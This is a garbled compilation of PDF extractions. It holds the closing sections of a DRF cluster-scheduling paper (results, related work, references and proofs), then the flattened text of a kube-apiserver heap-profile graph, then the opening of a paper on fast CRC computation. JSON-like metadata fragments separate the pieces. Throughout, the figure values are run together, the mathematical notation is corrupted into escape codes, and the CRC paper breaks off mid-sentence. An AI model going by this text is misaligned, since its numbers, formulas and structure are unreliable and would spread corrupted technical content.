CPU-fair0510152025303540353330\n17\n813Figure 9: Number of large jobs completed for each allocation\nscheme in our comparison of DRF against slot-based fair shar-\ning and CPU-only fair sharing.\nDRF 3 slots 4 slots 5 slots 6 slots CPU-fair020406080100 91\n376166\n3594\nFigure 10: Number of small jobs completed for each alloca-\ntion scheme in our comparison of DRF against slot-based fair\nsharing and CPU-only fair sharing.\ntity had four users submitting large jobs with task de-\nmandsh2 CPUs, 2 GBi. Each job consisted of 80tasks.\nAs soon as a job finished, the user would launch another\njob with similar demands. Each experiment ran for ten\nminutes. At the end, we computed the number of com-\npleted jobs of each type, as well as their response times.\nFor the slot-based allocation scheme, we varied the\nnumber of slots per machine from 3 to 6 to see how it\naffected performance. Figures 9 through 12 show our re-\nsults. In Figures 9 and 10, we compare the number of\njobs of each type completed for each scheduling scheme\nin ten minutes. In Figures 11 and 12, we compare aver-\nage response times.\nSeveral trends are apparent from the data. First, with\nslot-based scheduling, both the throughput and job re-\nsponse times are worse than with DRF, regardless of the\nnumber of slots. This is because with a low slot count,\nthe scheduler can undersubscribe nodes ( e.g.,, launch\nonly 3 small tasks on a node), while with a large slot\ncount, it can oversubscribe them ( e.g., launch 4 large\ntasks on a node and cause swapping because each task\nneeds 2 GB and the node only has 6 GB). Second, with\nfair sharing at the level of CPUs, the number of small\njobs executed is similar to DRF, but there are much fewer\nlarge jobs executed, because memory is overcommitted\non some machines and leads to poor performance for all\nthe high-memory tasks running there. Overall, the DRF-\nbased scheduler that is aware of both resources has the\nlowest response times and highest overall throughput.\n7.3 Simulations using Facebook Traces\nNext we use log traces from a 2000-node cluster at Face-\nbook, containing data for a one week period (October\nDRF 3 slots 4 slots 5 slots 6 slots CPU-fair050100150200\n65 69 72123196\n173Figure 11: Average response time (in seconds) of large jobs\nfor each allocation scheme in our comparison of DRF against\nslot-based fair sharing and CPU-only fair sharing.\nDRF 3 slots 4 slots 5 slots 6 slots CPU-fair010203040506070\n2561\n393556\n25\nFigure 12: Average response time (in seconds) of small jobs\nfor each allocation scheme in our comparison of DRF against\nslot-based fair sharing and CPU-only fair sharing.\n2010). The data consists of Hadoop MapReduce jobs.\nWe assume task duration, CPU usage, and memory con-\nsumption is identical as in the original trace. The traces\nare simulated on a smaller cluster of 400nodes to reach\nhigher utilization levels, such that fairness becomes rel-\nevant. Each node in the cluster consists of 12 slots, 16\ncores, and 32 GB memory. Figure 13 shows a short 300\nsecond sub-sample to visualize how CPU and memory\nutilization looks for the same workload when using DRF\ncompared to Hadoop’s fair scheduler (slot). As shown in\nthe figure, DRF provides higher utilization, as it is able\nto better match resource allocations with task demands.\nFigure 14 shows the reduction of the average job com-\npletion times for DRF as compared to the Hadoop fair\nscheduler. The workload is quite heavy on small jobs,\nwhich experience no improvements ( i.e.,\u00003%). This is\nbecause small jobs typically consist of a single execu-\ntion phase, and the completion time is dominated by the\nlongest task. Thus completion time is hard to improve\nfor such small jobs. In contrast, the completion times of\nthe larger jobs reduce by as much as 66%. This is be-\ncause these jobs consists of many phases, and thus they\ncan benefit from the higher utilization achieved by DRF.\n8 Related Work\nWe briefly review related work in computer science and\neconomics.\nWhile many papers in computer science focus on\nmulti-resource fairness, they are only considering multi-\nple instances of the same interchangeable resource, e.g.,\nCPU [6, 7, 35], and bandwidth [10, 20, 21]. Unlike these\napproaches, we focus on the allocation of resources of\ndifferent types.\n100 500 1000 1500 2000 25000.00.20.40.60.81.0CPU UtilizationDRF\nSlots\n0 500 1000 1500 2000 2500\nTime (s)0.00.20.40.60.81.0Memory UtilizationFigure 13: CPU and memory utilization for DRF and slot fair-\nness for a trace from a Facebook Hadoop cluster.\n1-500\n501-10001001-1500 1501-2000 2501-3000 2501-30003001-∞\nJob Size (tasks)010203040506070Completion Time Reduction-3%35%51%48%55%66%\n53%\nFigure 14: Average reduction of the completion times for dif-\nferent job sizes for a trace from a Facebook Hadoop cluster.\nQuincy [18] is a scheduler developed in the context\nof the Dryad cluster computing framework [17]. Quincy\nachieves fairness by modeling the fair scheduling prob-\nlem as a min-cost flow problem. Quincy does not cur-\nrently support multi-resource fairness. In fact, as men-\ntioned in the discussion section of the paper [18, pg. 17],\nit appears difficult to incorporate multi-resource require-\nments into the min-cost flow formulation.\nHadoop currently provides two fair sharing sched-\nulers [1, 2, 34]. Both these schedulers allocate resources\nat the slot granularity, where a slot is a fixed fraction of\nthe resources on a machine. As a result, these sched-\nulers cannot always match the resource allocations with\nthe tasks’ demands, especially when these demands are\nwidely heterogeneous. As we have shown in Section 7,\nthis mismatch may lead to either low cluster utilization\nor poor performance due to resource oversubscription.\nIn the microeconomic literature, the problem of equity\nhas been studied within and outside of the framework of\ngame theory. The books by Young [33] and Moulin [22]\nare entirely dedicated to these topics and provide good\nintroductions. The preferred method of fair division in\nmicroeconomics is CEEI [3, 33, 22], as introduced by\nVarian [30]. We have therefore devoted considerable at-\ntention to it in Section 5.2. CEEI’s main drawback com-pared to DRF is that it is not strategy-proof. As a result,\nusers can manipulate the scheduler by lying about their\ndemands.\nMany of the fair division policies proposed in the mi-\ncroeconomics literature are based on the notion of utility\nand, hence, focus on the single metric of utility. In the\neconomics literature, max-min fairness is known as the\nlexicographic ordering [26, 25] (leximin) of utilities.\nThe question is what the user utilities are in the multi-\nresource setting, and how to compare such utilities. One\nnatural way is to define utility as the number of tasks al-\nlocated to a user. But modeling utilities this way, together\nwith leximin, violates many of the fairness properties we\nproposed. Viewed in this light, DRF makes two contri-\nbutions. First, it suggests using the dominant share as a\nproxy for utility, which is equalized using the standard\nleximin ordering. Second, we prove that this scheme is\nstrategy-proof for such utility functions. Note that the\nleximin ordering is a lexicographic version of the Kalai-\nSmorodinsky (KS) solution [19]. Thus, our result shows\nthat KS is strategy-proof for such utilities.\n9 Conclusion and Future Work\nWe have introduced Dominant Resource Fairness (DRF),\na fair sharing model that generalizes max-min fairness to\nmultiple resource types. DRF allows cluster schedulers\nto take into account the heterogeneous demands of dat-\nacenter applications, leading to both fairer allocation of\nresources and higher utilization than existing solutions\nthat allocate identical resource slices (slots) to all tasks.\nDRF satisfies a number of desirable properties. In par-\nticular, DRF is strategy-proof, so that users are incen-\ntivized to report their demands accurately. DRF also in-\ncentivizes users to share resources by ensuring that users\nperform at least as well in a shared cluster as they would\nin smaller, separate clusters. Other schedulers that we in-\nvestigated, as well as alternative notions of fairness from\nthe microeconomic literature, fail to satisfy all of these\nproperties.\nWe have evaluated DRF by implementing it in the\nMesos resource manager, and shown that it can lead to\nbetter overall performance than the slot-based fair sched-\nulers that are commonly in use today.\n9.1 Future Work\nThere are several interesting directions for future re-\nsearch. First, in cluster environments with discrete tasks,\none interesting problem is to minimize resource frag-\nmentation without compromising fairness. This prob-\nlem is similar to bin-packing, but where one must pack\nas many items (tasks) as possible subject to meeting\nDRF. A second direction involves defining fairness when\ntasks have placement constraints, such as machine pref-\nerences. Given the current trend of multi-core machines,\n11a third interesting research direction is to explore the use\nof DRF as an operating system scheduler. Finally, from\na microeconomic perspective, a natural direction is to\ninvestigate whether DRF is the only possible strategy-\nproof policy for multi-resource fairness, given other de-\nsirable properties such Pareto efficiency.\n10 Acknowledgements\nWe thank Eric J. Friedman, Herv ´e Moulin, John Wilkes,\nand the anonymous reviewers for their invaluable feed-\nback. We thank Facebook for making available their\ntraces. This research was supported by California MI-\nCRO, California Discovery, the Swedish Research Coun-\ncil, the Natural Sciences and Engineering Research\nCouncil of Canada, a National Science Foundation Grad-\nuate Research Fellowship,5and the RAD Lab spon-\nsors: Google, Microsoft, Oracle, Amazon, Cisco, Cloud-\nera, eBay, Facebook, Fujitsu, HP, Intel, NetApp, SAP,\nVMware, and Yahoo!.\nReferences\n[1] Hadoop Capacity Scheduler.\nhttp://hadoop.apache.org/common/docs/r0.\n20.2/capacity_scheduler.html .\n[2] Hadoop Fair Scheduler.\nhttp://hadoop.apache.org/common/docs/r0.\n20.2/fair_scheduler.html .\n[3] Personal communication with Herv ´e Moulin.\n[4] A. K. Agrawala and R. M. Bryant. Models of memory\nscheduling. In SOSP ’75 , 1975.\n[5] J. Axboe. Linux Block IO – Present and Future\n(Completely Fair Queueing). In Ottawa Linux\nSymposium 2004 , pages 51–61, 2004.\n[6] S. K. Baruah, N. K. Cohen, C. G. Plaxton, and D. A.\nVarvel. Proportionate progress: A notion of fairness in\nresource allocation. Algorithmica , 15(6):600–625, 1996.\n[7] S. K. Baruah, J. Gehrke, and C. G. Plaxton. Fast\nscheduling of periodic tasks on multiple resources. In\nIPPS ’95 , 1995.\n[8] J. Bennett and H. Zhang. WF2Q: Worst-case fair\nweighted fair queueing. In INFOCOM , 1996.\n[9] D. Bertsekas and R. Gallager. Data Networks . Prentice\nHall, second edition, 1992.\n[10] J. M. Blanquer and B. ¨Ozden. Fair queuing for\naggregated multiple links. SIGCOMM ’01 ,\n31(4):189–197, 2001.\n[11] B. Caprita, W. C. Chan, J. Nieh, C. Stein, and H. Zheng.\nGroup ratio round-robin: O(1) proportional share\nscheduling for uniprocessor and multiprocessor systems.\nInUSENIX Annual Technical Conference , 2005.\n[12] A. Demers, S. Keshav, and S. Shenker. Analysis and\nsimulation of a fair queueing algorithm. In SIGCOMM\n’89, pages 1–12, New York, NY , USA, 1989. ACM.\n5Any opinions, findings, conclusions, or recommendations ex-\npressed in this publication are those of the authors and do not nec-\nessarily reflect the views of the NSF.[13] D. Foley. Resource allocation and the public sector. Yale\nEconomic Essays , 7(1):73–76, 1967.\n[14] A. Ghodsi, M. Zaharia, B. Hindman, A. Konwinski,\nS. Shenker, and I. Stoica. Dominant resource fairness:\nFair allocation of multiple resource types. Technical\nReport UCB/EECS-2011-18, EECS Department,\nUniversity of California, Berkeley, Mar 2011.\n[15] P. Goyal, H. Vin, and H. Cheng. Start-time fair queuing:\nA scheduling algorithm for integrated services packet\nswitching networks. IEEE/ACM Transactions on\nNetworking , 5(5):690–704, Oct. 1997.\n[16] B. Hindman, A. Konwinski, M. Zaharia, A. Ghodsi,\nA. D. Joseph, R. H. Katz, S. Shenker, and I. Stoica.\nMesos: A platform for fine-grained resource sharing in\nthe data center. In NSDI , 2011.\n[17] M. Isard, M. Budiu, Y . Yu, A. Birrell, and D. Fetterly.\nDryad: distributed data-parallel programs from\nsequential building blocks. In EuroSys 07 , 2007.\n[18] M. Isard, V . Prabhakaran, J. Currey, U. Wieder,\nK. Talwar, and A. Goldberg. Quincy: Fair scheduling for\ndistributed computing clusters. In SOSP ’09 , 2009.\n[19] E. Kalai and M. Smorodinsky. Other Solutions to Nash’s\nBargaining Problem. Econometrica , 43(3):513–518,\n1975.\n[20] J. M. Kleinberg, Y . Rabani, and ´E. Tardos. Fairness in\nrouting and load balancing. J. Comput. Syst. Sci. ,\n63(1):2–20, 2001.\n[21] Y . Liu and E. W. Knightly. Opportunistic fair scheduling\nover multiple wireless channels. In INFOCOM , 2003.\n[22] H. Moulin. Fair Division and Collective Welfare . The\nMIT Press, 2004.\n[23] J. Nash. The Bargaining Problem. Econometrica ,\n18(2):155–162, April 1950.\n[24] A. Parekh and R. Gallager. A generalized processor\nsharing approach to flow control - the single node case.\nACM/IEEE Transactions on Networking , 1(3):344–357,\nJune 1993.\n[25] E. A. Pazner and D. Schmeidler. Egalitarian equivalent\nallocations: A new concept of economic equity.\nQuarterly Journal of Economics , 92:671–687, 1978.\n[26] A. Sen. Rawls Versus Bentham: An Axiomatic\nExamination of the Pure Distribution Problem. Theory\nand Decision , 4(1):301–309, 1974.\n[27] M. Shreedhar and G. Varghese. Efficient fair queuing\nusing deficit round robin. IEEE Trans. Net , 1996.\n[28] I. Stoica, H. Abdel-Wahab, K. Jeffay, S. Baruah,\nJ. Gehrke, and G. Plaxton. A proportional share resource\nallocation algorithm for real-time, time-shared systems.\nInIEEE RTSS 96 , 1996.\n[29] I. Stoica, S. Shenker, and H. Zhang. Core-stateless fair\nqueueing: Achieving approximately fair bandwidth\nallocations in high speed networks. In SIGCOMM , 1998.\n[30] H. Varian. Equity, envy, and efficiency. Journal of\nEconomic Theory , 9(1):63–91, 1974.\n[31] C. A. Waldspurger. Lottery and Stride Scheduling:\nFlexible Proportional Share Resource Management .\nPhD thesis, MIT, Laboratory of Computer Science, Sept.\n1995. MIT/LCS/TR-667.\n[32] C. A. Waldspurger and W. E. Weihl. Lottery scheduling:\n12flexible proportional-share resource management. In\nOSDI ’94 , 1994.\n[33] H. P. Young. Equity: in theory and practice . Princeton\nUniversity Press, 1994.\n[34] M. Zaharia, D. Borthakur, J. Sen Sarma, K. Elmeleegy,\nS. Shenker, and I. Stoica. Delay Scheduling: A Simple\nTechnique for Achieving Locality and Fairness in\nCluster Scheduling. In EuroSys 10 , 2010.\n[35] D. Zhu, D. Moss ´e, and R. G. Melhem.\nMultiple-Resource Periodic Scheduling Problem: how\nmuch fairness is necessary? In IEEE RTSS , 2003.\nA Appendix: DRF Properties\nIn this appendix, we present the main properties of DRF.\nThe technical report [14] contains a more complete list\nof results for DRF and CEEI. For context, the following\ntable summarizes the properties satisfied by Asset Fair-\nness, CEEI, and DRF, respectively.\nIn this section, we assume that all users have an un-\nbounded number of tasks. In addition, we assume that\nall tasks of a user have the same demand vector, and we\nwill refer to this vector as the user’s demand vector.\nNext, we present progressive filling [9], a simple tech-\nnique to achieve DRF allocation when all resources are\narbitrary divisible. This technique is instrumental in\nproving our results.\nA.1 Progressive Filling for DRF\nProgressive filling is an idealized algorithm to achieve\nmax-min fairness in a system in which resources can\nbe allocated in arbitrary small amounts [9, pg 450]. It\nwas originally used in a networking context, but we now\nadapt it to our problem domain. In the case of DRF, pro-\ngressive filling increases all users’ dominant shares at the\nsame rate, while increasing their other resource alloca-\ntions proportionally to their task demand vectors, until at\nleast one resource is saturated. At this point, the alloca-\ntions of all users using the saturated resource are frozen,\nand progressive filling continues recursively after elim-\ninating these users. In this case, progressive filling ter-\nminates when there are no longer users whose dominant\nshares can be increased.\nProgressive filling for DRF is equivalent to the\nscheduling algorithm presented in Figure 1 after appro-\npriately scaling the users’ demand vectors. In particular,\neach user’s demand vector is scaled such that allocating\nresources to a user according to her scaled demand vec-\ntor will increase her dominant share by a fixed \u000f, which\nis the same for all users. Let Di=hdi;1;di;2;:::;di;mi\nbe the demand vector of user i, letrkbe her domi-\nnant share6, and letsi=di;k\nrkbe her dominant share.\nWe then scale the demand vector of user iby\u000f\nsi,i.e.,\nD0\ni=\u000f\nsiDi=\u000f\nsihdi;1;di;2;:::;di;mi. Thus, every time\n6Recall that in this section we assume that all tasks of a user have\nthe same demand vector.a task of user iis selected, she is allocated an amount\n\u000f\nsidi;k=\u000f\u0001rkof the dominant resource. This means that\nthe share of the dominant resource of user iincreases by\n(\u000f\u0001rk)=rk=\u000f, as expected.\nA.2 Allocation Properties\nWe start with a preliminary result.\nLemma 8 Every user in a DRF allocation has at least\none saturated resource.\nProof Assume this is not the case, i.e.,none of the re-\nsources used by user iis saturated. However, this con-\ntradicts the assumption that progressive filling has com-\npleted the computation of the DRF allocation. Indeed,\nas long as none of the resources of user iare saturated,\nprogressive filling will continue to increase the alloca-\ntions of user i(and of all the other users sharing only\nnon-saturated resources). \u0003\nRecall that progressive filling always allocates the re-\nsources to a user proportionally to the user’s demand\nvector. More precisely, let Di=hdi;1;di;2;:::;di;mi\nbe the demand vector of user i. Then, at any time tdur-\ning the progressive filling process, the allocation of user\niis proportional to the demand vector,\nAi(t) =\u000bi(t)\u0001Di=\u000bi(t)\u0001hdi;1;di;2;:::;di;mi(1)\nwhere\u000bi(t)is a positive scalar.\nNow, we are in position to prove the DRF properties.\nTheorem 9 DRF is Pareto efficient.\nProof Assume user ican increase her dominant share,\nsi, without decreasing the dominant share of anyone else.\nAccording to Lemma 8, user ihas at least one saturated\nresource. If no other user is using the saturated resource,\nthen we are done as it would be impossible to increase i’s\nshare of the saturated resource. If other users are using\nthe saturated resource, then increasing the allocation of\niwould result in decreasing the allocation of at least an-\nother userjsharing the same saturated resource. Since\nunder progressive filling, the resources allocated by any\nuser are proportional to her demand vector (see Eq. 1),\ndecreasing the allocation of any resource used by user i\nwill also decrease i’s dominant share. This contradicts\nour hypothesis, and therefore proves the result. \u0003\nTheorem 10 DRF satisfies the sharing incentive and\nbottleneck fairness properties.\nProof Consider a system consisting of nusers. Assume\nresourcekis the first one being saturated by using pro-\ngressive filling. Let ibe the user allocating the largest\nshare on resource k, and letti;kdenote her share of k.\nSince resource kis saturated, we have trivially ti;k\u00151\nn.\n13Furthermore, by the definition of the dominant share, we\nhavesi\u0015ti;k\u00151\nn. Since progressive filling increases\nthe allocation of each user’s dominant resource at the\nsame rate, it follows that each user gets at least1\nnof her\ndominant resource. Thus, DRF satisfies the sharing in-\ncentive property. If all users have the same dominant\nresource, each user gets exactly1\nnof that resource. As a\nresult, DRF satisfies the bottleneck fairness property as\nwell. \u0003\nTheorem 11 Every DRF allocation is envy-free.\nProof Assume by contradiction that user ienvies an-\nother userj. For userito envy another user j, userj\nmust have a strictly higher share of every resource that i\nwants; otherwise icannot run more tasks under j’s allo-\ncation. This means that user j’s dominant share is strictly\nlarger than user i’s dominant share. Since every resource\nallocated to user iis also allocated to user j, this means\nthat userjcannot reach its saturated resource after useri,\ni.e.,tj\u0014ti, wheretkis the time that user k’s allocation\ngets frozen due to saturation. However, if tj\u0014ti, under\nprogressive filling, the dominant shares of users jandi\nwill be equal at time tj, after which the dominant share\nof userican only increase, violating the hypothesis. \u0003\nTheorem 12 (Strategy-proofness) A user cannot in-\ncrease her dominant share in DRF by altering her true\ndemand vector.\nProof Assume user ican increase her dominant share by\nusing a demand vector ^di6=di. Letai;jand^ai;jdenote\nthe amount of resource juseriis allocated using pro-\ngressive filling when the user uses the vector diand^di,\nrespectively. For user ito be better off using ^di, we need\nthat^ai;k> ai;kfor every resource kwheredi;k>0.\nLetrdenote the first resource that becomes saturated for\nuseriwhen she uses the demand vector di. If no other\nuser is allocated resource r(aj;r= 0 for allj6=i),\nthis contradicts the hypothesis as user iis already allo-\ncated the entire resource r, and thus cannot increase her\nallocation of rusing another demand vector ^di. Thus,\nassume there are other users that have been allocated r\n(aj;r>0for somej6=i). In this case, progressive fill-\ning will eventually saturate rat timetwhen usingdi, and\nat timet0when using demand ^di. Recall that the domi-\nnant share is the maximum of a user’s shares, thus imust\nhave a higher dominant share in the allocation ^athan in\na. Thus,t0>t, as progressive filling increases the dom-\ninant share at a constant rate. This implies that i—when\nusing ^d—does not saturate any resource before time t0,\nand hence does not affect other user’s allocation before\ntimet0. Thus, when iuses ^d, any usermusing resource\nrhas allocation am;rat timet. Therefore, at time t, there\nis onlyai;ramount ofrleft for user i, which contradicts\nthe assumption that ^ai;r>ai;r. \u0003The strategy-proofness of DRF shows that a user will\nnot be better off by demanding resources that she does\nnot need. The following example shows that excess de-\nmand can in fact hurt user’s allocation, leading to a lower\ndominant share. Consider a cluster with two resources,\nand10users, the first with demand vector h1;0iand the\nrest with demand vectors h0;1i. The first user gets the\nentire first resource, while the rest of the users each get\n1\n9of the second resource. If user 1instead changes her\ndemand vector toh1;1i, she can only be allocated1\n10of\neach resource and the rest of the users get1\n10of the sec-\nond resource.\nIn practice, the situation can be exacerbated as re-\nsources in datacenters are typically partitioned across\ndifferent physical machines, leading to fragmentation.\nIncreasing one’s demand artificially might lead to a situ-\nation in which, while there are enough resources on the\nwhole, there are not enough on any single machine to\nsatisfy the new demand. See Section 6.2 for more infor-\nmation.\nNext, for simplicity we assume strictly positive de-\nmand vectors ,i.e.,the demand of every user for every\nresource is non-zero.\nTheorem 13 Given strictly positive demand vectors,\nDRF guarantees that every user gets the same dominant\nshare, i.e.,every DRF allocation ensures si=sj, for all\nusersiandj.\nProof Progressive filling will start increasing every\nusers’ dominant resource allocation at the same rate until\none of the resources becomes saturated. At this point, no\nmore resources can be allocated to any user as every user\ndemands a positive amount of the saturated resource. \u0003\nTheorem 14 Given strictly positive demands, DRF sat-\nisfies population monotonicity.\nProof Consider any DRF allocation. Non-zero demands\nimply that all users have the same saturated resource(s).\nConsider removing a user and relinquishing her currently\nallocated resources, which is some amount of every re-\nsource. Since all users have the same dominant share \u000b,\nany new allocation which decreases any user i’s domi-\nnant share below \u000bwould, due to Pareto efficiency, have\nto allocate another user ja dominant share of more than\n\u000b. The resulting allocation would violate max-min fair-\nness, as it would be possible to increase i’s dominant\nshare by decreasing the allocation of j, who already has\na higher dominant share than i. \u0003\nHowever, we note that in the absence of strictly posi-\ntive demand vectors, DRF no longer satisfies the popula-\ntion monotonicity property [14].\n14" } ]
{ "category": "Orchestration & Management", "file_name": "kube-apiserver-heap-profile.pdf", "project_name": "Crossplane", "subcategory": "Scheduling & Orchestration" }
[ { "data": "File: kube-apiserver\nType: inuse_space\nTime: Feb 24, 2022 at 2:49am (+03)\nShowing nodes accounting for 876.08MB, 73.76% of 1187.82MB total\nDropped 685 nodes (cum <= 5.94MB)\nDropped 10 edges (freq <= 1.19MB)\nShowing top 53 nodes out of 268\nSee https://git.io/JfYMW for how to read the graph\nzapcore\nnewCounters\n369.12MB (31.08%)\n448kB 369.12MBmux\n(*pathHandler)\nServeHTTP\n0 of 585.73MB (49.31%)http\nHandlerFunc\nServeHTTP\n0 of 243.94MB (20.54%)\n 67.58MBapiserver\n(*crdHandler)\nServeHTTP\n0 of 512.95MB (43.18%)\n 511.95MBapiserver\n(*crdHandler)\ngetOrCreateServingInfoFor\n5MB (0.42%)\nof 505.89MB (42.59%)\n512B..576B 1.50MB\nregistry\n(*Store)\nCompleteWithOptions\n1MB (0.084%)\nof 386.99MB (32.58%) 356.21MB\nvalidation\nConvertJSONSchemaPropsWithPostProcess\n0.50MB (0.042%)\nof 46.52MB (3.92%) 34.52MB\nschemaconv\n(*convert)\nVisitKind\n19.52MB (1.64%)\nof 26.52MB (2.23%) 18.01MB\nschema\n(*Structural)\nDeepCopyInto\n23.50MB (1.98%)\nof 24.50MB (2.06%) 22MB\nruntime\n(*SchemeBuilder)\nAddToScheme\n0 of 49.07MB (4.13%) 48.06MBserver\ndirector\nServeHTTP\n0 of 584.68MB (49.22%) 237.90MB\nflowcontrol\n(*configController)\nHandle\nfunc2\n0 of 98.57MB (8.30%) 22.01MB\nhandler\n(*cache)\nGet\n0 of 67.58MB (5.69%) 67.58MB\n 584.68MBwait\nBackoffUntil\nfunc1\n0 of 157.40MB (13.25%)\nv1\n(*JSONSchemaProps)\nUnmarshal\n33.01MB (2.78%)\nof 38.02MB (3.20%) 2MB\njson\nUnmarshalCaseSensitivePreserveInts\n0 of 39.40MB (3.32%) 10.87MB\n (inline)openapi\n(*Controller)\nsync\n0.51MB (0.043%)\nof 126.12MB (10.62%) 124.62MB\njson\n(*decodeState)\nvalue\n0 of 105.46MB (8.88%)\njson\n(*decodeState)\nobject\n0 of 105.46MB (8.88%) 105.46MB\njson\n(*decodeState)\narray\n0 of 35.55MB (2.99%) 35.55MBv1beta1\nautoConvert_v1beta1_JSONSchemaProps_To_apiextensions_JSONSchemaProps\n69.03MB (5.81%)\nof 80.03MB (6.74%)\n512B 56.53MB\n208B 7MBv1beta1\nConvert_v1beta1_JSONSchemaProps_To_apiextensions_JSONSchemaProps\n0 of 80.03MB (6.74%)\n 73.53MB\n (inline)\nv1beta1\nautoConvert_v1beta1_JSONSchemaPropsOrArray_To_apiextensions_JSONSchemaPropsOrArray\n10MB (0.84%)\nof 40.52MB (3.41%) 40.52MB\n 105.46MBjson\nUnmarshal\n0 of 105.46MB (8.88%)\n 103.58MB\nreflect\nmapassign\n19.52MB (1.64%) 19.52MB\nspec\n(*ResponsesProps)\nUnmarshalJSON\n12.01MB (1.01%)\nof 24.51MB (2.06%) 24.51MBregistry\nStorageWithCacher\nfunc1\n0 of 385.99MB (32.50%) 385.99MBjson\nMarshal\n28.77MB (2.42%)\nof 64.33MB (5.42%)\n22.55MB 22.55MB\njson\n(*encodeState)\nreflectValue\n0 of 36.67MB (3.09%) 35.56MB\n 105.46MB 80.03MB\nvalidation\nconvertMapOfJSONSchemaProps\n34.52MB (2.91%)\nof 46.52MB (3.92%) 46.52MB\nvalidation\nconvertJSONSchemaPropsOrArray\n11.51MB (0.97%)\nof 26.01MB (2.19%) 26.01MBtransport\nnewBufWriter\n57.98MB (4.88%)\n64kB 57.98MB\nbuilder\nBuildOpenAPIV2\n0 of 117.60MB (9.90%)\nschema\n(*Structural)\nToKubeOpenAPI\n25.51MB (2.15%)\nof 26.51MB (2.23%) 26.51MB\nbuilder\nBuildOpenAPISpec\n0 of 91.10MB (7.67%) 85.09MB\nbytes\nmakeSlice\n40.28MB (3.39%)\n35MB 35MBruntime\nDecode\n0 of 102.54MB (8.63%)\n 26.51MB\nversioning\n(*codec)\nDecode\n0 of 73.53MB (6.19%) 73.53MB\n512B 30.51MBgrpc\n(*addrConn)\nresetTransport\n0 of 83.66MB (7.04%)\ntransport\nnewFramer\n0 of 82.16MB (6.92%) 82.16MB\n 40.52MB\n576B 27.52MBjson\n(*decodeState)\nvalue\n0 of 58.93MB (4.96%) 39.40MB\njson\n(*decodeState)\nobject\n0 of 59.93MB (5.05%) 58.43MB\nbuilder\n(*openAPI)\nbuildOperations\n25.06MB (2.11%)\nof 47.57MB (4.00%)\n5.25kB 8.04MB\n896B 7.51MB\nbuilder\n(*openAPI)\ntoSchema\n10.01MB (0.84%)\nof 20.01MB (1.68%) 20.01MBetcd3\n(*watchChan)\nprocessEvent\n0 of 71.53MB (6.02%)\n 71.53MB\n (inline)\nconversion\nConversionFuncs\nAddUntyped\n31.99MB (2.69%)\n24kB 14.84MB\n12kB 9.61MB\n6kB 6.04MB 57.98MB\n (inline)\nbufio\nNewReaderSize\n22.18MB (1.87%) 22.18MB\n (inline)\n512B 8MB\n128B 7MB\nreflect\nunsafe_NewArray\n25.54MB (2.15%)\n1.38kB 10.51MB\n3kB 7.02MB 42.93MB 3MB\n (inline)\n 16MBapp\nRun\n0 of 59.83MB (5.04%)\n 3.52MB\n (inline)\ncontrolplane\ncompletedConfig\nNew\n0 of 47.30MB (3.98%) 47.30MB\n 6.01MBhttp\n(*timeoutHandler)\nServeHTTP\nfunc1\n0 of 60.60MB (5.10%)\n 60.60MB 505.39MB 7.06MB\n576B 20.51MB 57.53MB\n (inline) 12.50MB\n (inline)\n256B 11MB\n176B 8MBruntime\nmain\n0 of 41.33MB (3.48%)\n 37.82MB\n 29.28MB 8MB32kB 22.18MB\n 37.52MB\n (inline)\n512B 10MB\n576B 16.51MB 12.50MB\n896B 11.51MBjson\nmarshalerEncoder\n0 of 35.56MB (2.99%) 35.56MB\n 35.56MB 24.51MB\n576B 11.51MB\n 14.01MB\n 21.04MB 47.57MB\n576B 13.51MB 35.56MB 30.99MB 117.60MB\n 366.87MB\n (inline) 98.57MB\n 63.77MB" } ]
{ "category": "Orchestration & Management", "file_name": "crc-doc.1.0.pdf", "project_name": "Pipy", "subcategory": "Service Proxy" }
[ { "data": "Everything we know about CRC but afraid to\nforget\nAndrew Kadatch1and Bob Jenkins2\n1Google Inc.\n2Microsoft Corporation\nSeptember 3, 2010\nAbstract\nThis paper describes a novel interleaved, parallelizeable word-by-word\nCRC computation algorithm which computes N-bit CRC ( N\u001464) on\nmodern Intel and AMD processors in 1.2 CPU cycles per byte, improv-\ning state of the art over word-by-word 32-bit and 64-bit CRCs (2.1 CPU\ncycles/byte) and classic byte-by-byte CRC computation (6-7 CPU cy-\ncles/byte). It computes 128-bit CRC in 1.7 CPU cycles/byte.\nCRC implementations are heavily optimized and hard to understand.\nThis paper describes CRC algorithms as they evolved over time, splitting\ncomplex optimizations into a sequence of natural improvements.\nThis paper also presents a collection of CRC \\tricks\" that we found\nhandy on many occassions.\nContents\n1 De\fnition of CRC 2\n2 Related work 3\n3 CRC tricks and tips 4\n3.1 Incremental CRC computation . . . . . . . . . . . . . . . . . . . 4\n3.2 Changing initial CRC value . . . . . . . . . . . . . . . . . . . . . 4\n3.3 Concatenation of CRCs . . . . . . . . . . . . . . . . . . . . . . . 5\n3.4 In-place modi\fcation of CRC-ed message . . . . . . . . . . . . . 5\n3.5 Storing CRC value after the message . . . . . . . . . . . . . . . . 6\n4 E\u000ecient software implementation 7\n4.1 Mapping bitstreams to hardware registers . . . . . . . . . . . . . 7\n4.2 Multiplication of D-normalized polynomials . . . . . . . . . . . . 7\n4.3 Multiplication of unnormalized polynomial . . . . . . . . . . . . . 7\n14.4 Computing powers of x. . . . . . . . . . . . . . . . . . . . . . . 8\n4.5 Simpli\fed CRC . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9\n4.6 Computing a CRC byte by byte . . . . . . . . . . . . . . . . . . . 9\n4.7 Rolling CRC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11\n4.8 Reading multiple bytes at a time . . . . . . . . . . . . . . . . . . 12\n4.9 Computing a CRC word by word . . . . . . . . . . . . . . . . . . 12\n4.10 Processing non-overlapping blocks in parallel . . . . . . . . . . . 13\n4.11 Interleaved word-by-word CRC . . . . . . . . . . . . . . . . . . . 16\n4.11.1 Parallelizing CRC computation . . . . . . . . . . . . . . . 16\n4.11.2 Combining individual CRCs . . . . . . . . . . . . . . . . . 18\n4.11.3 E\u000ecient computation of individual CRCs . . . . . . . . . 19\n5 Experimental results 22\n5.1 Testing methology . . . . . . . . . . . . . . . . . . . . . . . . . . 22\n5.2 Compiler comparison . . . . . . . . . . . . . . . . . . . . . . . . . 22\n5.3 Choice of interleave level . . . . . . . . . . . . . . . . . . . . . . . 23\n5.4 Performance of CRC algorithms . . . . . . . . . . . . . . . . . . . 23\n1 De\fnition of CRC\nCyclic Redundancy Check (CRC) is a well-known technique that allows the\nrecipient of a message transmitted over a noisy channel to detect whether the\nmessage has been corrupted.\nA message M=m0: : : m N\u00001comprised of N=jMjbits ( mk2f0;1g) may\nbe viewed either as a numeric 